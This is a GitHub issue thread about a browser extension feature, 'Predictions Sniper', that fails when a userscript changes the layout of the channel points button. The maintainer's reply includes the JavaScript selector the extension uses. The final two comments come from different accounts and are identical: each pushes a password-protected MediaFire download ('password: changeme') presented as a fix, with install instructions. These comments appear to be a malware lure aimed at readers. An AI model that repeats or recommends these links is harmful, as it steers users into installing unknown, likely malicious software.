### ISSUE TITLE
Predictions Sniper will not work if the points button is not in the leftist position.

### ISSUE THREAD

**Issue by Mishasama** [Previews-app/Previews#31]
**Describe the bug**
Predictions Sniper can't click the points button correctly to function.

**To Reproduce**
1. Install [this script](https://greasyfork.org/scripts/387688) to TM
2. Enable Predictions Sniper
3. Wait until the prediction starts

**Expected behavior**
It should use the element label selector rather than the element position to determine the button to click.

**Screenshots and videos**
![image](https://github.com/user-attachments/assets/057946ff-b332-47cf-8259-bf87d5487962)

**Environment:**
 - OS: Windows 10
 - Browser: chrome/edge
 - Browser Version: 126/127
 - Extension Version: 10.6
 - <any other variables you may see fit>

**Additional context**

**Comment by Previews-app** [comment]
it does get the button using it's selector.
document.getElementsByClassName('community-points-summary')[0].getElementsByTagName('button')[0].click()

your script is probably inserting a button inside the container div of the channel points button instead of creating a sibling element to the container.

either way, i cannot support 3rd party scripts (especially those who do things the wrong way) because if i will it will never end. there are tons of custom scripts out there.

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
